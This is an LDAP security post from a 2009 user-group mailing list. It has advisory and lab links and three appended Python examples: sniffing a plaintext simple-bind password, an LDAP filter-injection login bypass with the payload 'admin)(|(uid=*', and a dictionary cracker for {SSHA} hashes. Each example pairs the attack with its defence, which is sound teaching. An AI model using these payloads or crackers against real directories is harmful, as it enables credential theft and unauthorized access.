[PLUG-Devel] HackFest Series: LDAP

Lisa Kachold lisakachold at obnosis.com
Fri Jan 2 10:34:58 MST 2009


LDAP (RFC 4513) has some security issues. In any security model, we mitigate possible problems with layered technology.
RFC:  http://www.rfc-editor.org/rfc/rfc4513.txt

PCI Compliance and LDAP Security:
The best way to mitigate LDAP network issues is through PCI compliance or isolated server network engineering, completing the model with VLAN or switch network isolation wherever packet interception might occur, since passwords and packets are sent either in clear text or encoded using Base64 encoding, which can be trivially intercepted.

http://www.faqs.org/ftp/pub/internet-drafts/draft-behera-ldap-password-policy-09.txt

Extract from the draft's abstract:
"..In order to improve the security of LDAP directories and make it difficult for password cracking programs to break into directories, it is desirable to enforce a set of rules on password usage. These rules are made to ensure that users change their passwords periodically, passwords meet construction requirements, the re-use of old password is restricted, and users are locked out after a certain number of failed attempts."

Network or "bottom up" OSI Security:
With such a concentration of data in the directory, network security becomes very important. Anyone who could modify the data could give themselves access to vast numbers of machines at a stroke. Some data needs to be protected from unauthorized viewing: although all passwords are hashed, anyone who can read the hashes can mount a dictionary attack.

Network Mitigation:
The layer that, in the final analysis, protects LDAP from shared-network-based attacks is layer 8, human trust; i.e. no professional on your network is expected to be so ill-intentioned or foolhardy as to misuse trust. At some point all of us are dangerous and unstoppable; it's expected we have bigger games to play than exploiting trust?

OSI Application Layer or Top Down:
More subtly, anyone who can hijack a client-server connection can feed bogus data to an individual client, or use the client's privileges to modify server data. All these things can be protected against, and LDAP now has most of the tools needed to do it.

Perl Mod Recommendations:
http://search.cpan.org/~gbarr/perl-ldap/lib/Net/LDAP/Security.pod

J2EE:
http://www.theserverside.com/tt/articles/article.tss?l=LDAP

MSDN LDAP:
http://msdn.microsoft.com/en-us/library/aa913688.aspx

Exploits:  Always check your VERSIONS and mitigate or patch any known issues!

April 2008 Cisco ASA/PIX LDAP hole:  http://www.cisco.com/en/US/products/products_security_advisory09186a0080833166.shtml

Web Injection Attacks: http://www.webappsec.org/projects/threat/classes/ldap_injection.shtml

LDAP Server Information Disclosure Vulnerability: http://www.lifedork.com/ldapuserenum-active-directory-ldap-server-information-disclosure-vulnerability.html

PHP LDAP:
http://www.securitytutorials3.thetazzone.com/owasp.html

Hakin9 gives us examples:
http://blog.security4all.be/2008/04/hakin9-magazine-3rd-edition-2008-ldap.html

The proof is in the practice - Labs:

Extracting hashes with crypt/John:  http://marc.info/?l=john-users&m=120270251402411&w=2

Using John: http://www.openwall.com/lists/john-users/2005/09/17/1

Tools: 
http://www.crackserialkeygen.us/search/ldap+crack

Disclaimer: At no time have we compared simple SMTP, SSH, HTTP auth, AD LDAP or mail password security, or analyzed any other security risks as comparisons. The intention is to educate. Each *nix user must understand the risks before implementing any protocol. LDAP can make your network more secure when properly implemented.

www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
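The "clear text" point in the PCI/network section above, shown on the wire. This is an added example, not code from the original post: it BER-decodes an LDAP simple BindRequest (RFC 4511) captured off the network and pulls out the bind DN and password. The capture bytes are constructed here (messageID 1, protocol version 3, bind DN cn=admin,dc=example,dc=com, password "hunter2"), not taken from a real trace. Without StartTLS or LDAPS, anyone who can sniff the segment gets exactly this.

```python
"""Decode a captured LDAP simple BindRequest (RFC 4511, BER/DER encoded).

Added example. CAPTURED_BIND is a constructed packet, not a real capture.
The point: the "simple" authentication choice carries the password as a
plain OCTET STRING, so it is readable by anyone on the path unless the
connection is wrapped in TLS.
"""

# Constructed capture: messageID 1, BindRequest v3, DN cn=admin,dc=example,dc=com,
# simple authentication with the password "hunter2".
CAPTURED_BIND = bytes.fromhex(
    "302d020101"                  # LDAPMessage SEQUENCE (45 bytes), messageID INTEGER 1
    "6028"                        # [APPLICATION 0] BindRequest, 40 bytes of content
    "020103"                      # version INTEGER 3
    "041a636e3d61646d696e2c64633d6578616d706c652c64633d636f6d"  # name LDAPDN (26 bytes)
    "800768756e74657232"          # [0] simple OCTET STRING "hunter2" - the password
)


def _ber_len(n: int) -> bytes:
    """Encode a BER length (short form < 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber(tag: int, content: bytes) -> bytes:
    """Wrap content in a BER TLV with the given tag byte."""
    return bytes([tag]) + _ber_len(len(content)) + content


def ber_int(value: int) -> bytes:
    """Encode a non-negative INTEGER (minimal two's-complement, so 128 -> 00 80)."""
    return ber(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))


def encode_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """Build the exact bytes an LDAP client sends for a simple bind."""
    auth = ber(0x80, password.encode())             # AuthenticationChoice [0] simple
    bind = ber(0x60, ber_int(3) + ber(0x04, dn.encode()) + auth)  # [APPLICATION 0]
    return ber(0x30, ber_int(message_id) + bind)    # LDAPMessage SEQUENCE


def read_tlv(data: bytes, pos: int):
    """Return (tag, content, position after this TLV) for the TLV at pos."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                                # long-form length
        n = length & 0x7F
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    return tag, data[pos:pos + length], pos + length


def parse_bind_request(packet: bytes) -> dict:
    """Decode one LDAPMessage carrying a BindRequest; recover the credentials."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(msg, pos)
    if tag != 0x60:
        raise ValueError("protocolOp is not a BindRequest")
    _, version, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    tag, cred, pos = read_tlv(op, pos)
    result = {"message_id": int.from_bytes(mid, "big"),
              "version": version[0], "name": name.decode()}
    if tag == 0x80:                                  # simple: password in the clear
        result["auth"] = "simple"
        result["password"] = cred.decode()
    elif tag == 0xA3:                                # sasl: mechanism name first
        _, mech, _ = read_tlv(cred, 0)
        result["auth"] = "sasl"
        result["mechanism"] = mech.decode()
    else:
        raise ValueError("unknown AuthenticationChoice tag 0x%02x" % tag)
    return result


if __name__ == "__main__":
    print(parse_bind_request(CAPTURED_BIND))
```

The same decoder applied to a real trace (tcpdump -s0 port 389, then the TCP payload) gives the same result; the only defence is to refuse simple binds over plaintext (OpenLDAP: security ssf=128 or simple_bind=128) or to put the server on a segment nobody else can tap, which is the isolation the post recommends.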

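The web injection class linked above (WASC "LDAP Injection"), worked through in code. This is an added example, not from the original post or from the WASC page: a toy in-memory directory with a minimal RFC 4515 filter evaluator, a login routine that splices user input straight into a search filter, and the same routine with the values escaped. The directory entries and the attacker strings are constructed; the "(&(uid=...)(userPassword=...))" pattern is the textbook vulnerable one, and the evaluator is a deliberately small model, not a real LDAP server.

```python
"""LDAP filter injection: vulnerable vs. escaped filter construction.

Added example with a constructed toy directory and a minimal filter evaluator
(supports &, | and equality with '*' wildcards, per RFC 4515 syntax).
"""
import re

# Constructed sample directory (a real server would not let you search on
# userPassword; the pattern below is nonetheless what injection write-ups target).
DIRECTORY = [
    {"uid": "admin", "userPassword": "s3cret"},
    {"uid": "alice", "userPassword": "wonderland"},
]

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """Escape user-supplied text before it is placed inside a filter."""
    return "".join(_ESCAPES.get(c, c) for c in value)


def _parse(s: str, i: int):
    """Recursive-descent parse of one filter item starting at s[i] == '('."""
    if i >= len(s) or s[i] != "(":
        raise ValueError("expected '(' at %d" % i)
    i += 1
    if i < len(s) and s[i] in "&|":
        op, i, subs = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            node, i = _parse(s, i)
            subs.append(node)
        if i >= len(s) or s[i] != ")":
            raise ValueError("unterminated %s filter" % op)
        return (op, subs), i + 1
    j = s.index(")", i)                      # a literal ')' in a value must be \29
    attr, _, pattern = s[i:j].partition("=")
    return ("=", attr, pattern), j + 1


def parse_filter(s: str):
    node, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing data after filter")
    return node


def _unescape(v: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), v)


def _matches(node, entry) -> bool:
    kind = node[0]
    if kind == "&":
        return all(_matches(n, entry) for n in node[1])
    if kind == "|":
        return any(_matches(n, entry) for n in node[1])
    _, attr, pattern = node
    actual = entry.get(attr)
    if actual is None:
        return False
    # Unescaped '*' is a wildcard; '\2a' is a literal asterisk.
    regex = ".*".join(re.escape(_unescape(p)) for p in pattern.split("*"))
    return re.fullmatch(regex, actual, re.IGNORECASE) is not None


def search(filter_str: str):
    """Return the uids of entries matching the filter."""
    node = parse_filter(filter_str)
    return [e["uid"] for e in DIRECTORY if _matches(node, e)]


def login_vulnerable(user: str, password: str):
    # Raw interpolation: the attacker controls filter structure, not just a value.
    return search("(&(uid=%s)(userPassword=%s))" % (user, password))


def login_safe(user: str, password: str):
    return search("(&(uid=%s)(userPassword=%s))"
                  % (escape_filter_value(user), escape_filter_value(password)))


if __name__ == "__main__":
    # Attacker-controlled input (constructed): closes the uid assertion, opens an
    # OR that is always true, and the password field supplies the final ')'.
    user, pw = "admin)(|(uid=*", "x)"
    print("vulnerable:", login_vulnerable(user, pw))   # ['admin'] without the password
    print("escaped:   ", login_safe(user, pw))         # []
    print("enumerate: ", search("(uid=*)"))             # every uid in the directory
```

The escaped form turns the attacker's parentheses and asterisk into \28, \29 and \2a, so they are compared as characters in the value rather than parsed as filter syntax; the same rule applies to DN components (RFC 4514 has its own escape set) and to search bases built from input.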

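The dictionary attack from the "bottom up" section ("anyone who can read the hashes can mount a dictionary attack") together with the hash-extraction lab link. This is an added example, not from the original post or the john-users threads it links: it reads userPassword values out of LDIF (the "::" base64 form that ldapsearch emits), recognises the {SSHA} and {SHA} schemes OpenLDAP uses, and tries a wordlist against each. The LDIF, the salts and the wordlist are constructed; in practice you would feed the decoded hashes to John the Ripper, which does the same comparison far faster.

```python
"""Dictionary attack on {SSHA}/{SHA} userPassword hashes pulled from LDIF.

Added example. SAMPLE_LDIF, the salts and WORDLIST are constructed inline.
{SSHA} = base64( sha1(password + salt) + salt ), salt usually 4 bytes (OpenLDAP);
{SHA}  = base64( sha1(password) ), unsalted.
"""
import base64
import hashlib


def make_ssha(password: str, salt: bytes) -> str:
    digest = hashlib.sha1(password.encode() + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode()


def make_sha(password: str) -> str:
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def verify(stored: str, candidate: str) -> bool:
    """Check a candidate password against a {SSHA} or {SHA} userPassword value."""
    scheme, _, b64 = stored.partition("}")
    raw = base64.b64decode(b64)
    if scheme == "{SSHA":
        digest, salt = raw[:20], raw[20:]           # SHA-1 is 20 bytes; rest is salt
        return hashlib.sha1(candidate.encode() + salt).digest() == digest
    if scheme == "{SHA":
        return hashlib.sha1(candidate.encode()).digest() == raw
    raise ValueError("unsupported scheme " + scheme + "}")


def parse_ldif(text: str):
    """Minimal LDIF reader: blank line separates entries, '::' marks base64 values."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if "::" in line:
            attr, value = line.split("::", 1)
            value = base64.b64decode(value.strip()).decode()
        else:
            attr, value = line.split(":", 1)
            value = value.strip()
        current[attr] = value
    if current:
        entries.append(current)
    return entries


def crack(entries, wordlist):
    """Return {dn: password} for every entry whose hash matches a wordlist entry."""
    found = {}
    for entry in entries:
        stored = entry.get("userPassword")
        if not stored:
            continue
        for word in wordlist:
            if verify(stored, word):
                found[entry["dn"]] = word
                break
    return found


def _ldif_pw(hashed: str) -> str:
    # ldapsearch base64-encodes userPassword on output because of the braces.
    return "userPassword:: " + base64.b64encode(hashed.encode()).decode()


# Constructed export; salts fixed so the sample is reproducible.
SAMPLE_LDIF = "\n".join([
    "dn: uid=alice,ou=people,dc=example,dc=com",
    "uid: alice",
    _ldif_pw(make_ssha("hunter2", b"\x01\x02\x03\x04")),
    "",
    "dn: uid=bob,ou=people,dc=example,dc=com",
    "uid: bob",
    _ldif_pw(make_sha("letmein")),
    "",
    "dn: cn=admin,dc=example,dc=com",
    "cn: admin",
    _ldif_pw(make_ssha("Tr0ub4dor&3", b"\x9a\xbc\xde\xf0")),
])

WORDLIST = ["password", "123456", "letmein", "hunter2", "welcome"]  # constructed

if __name__ == "__main__":
    for dn, pw in crack(parse_ldif(SAMPLE_LDIF), WORDLIST).items():
        print(dn, "->", pw)
```

The salt in {SSHA} only defeats precomputed tables; each hash still falls to a per-entry dictionary run at SHA-1 speed, which is why read access to userPassword must be restricted in the ACL (OpenLDAP: access to attrs=userPassword by self write by anonymous auth by * none) and why the password-policy rules quoted from the Behera draft matter.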

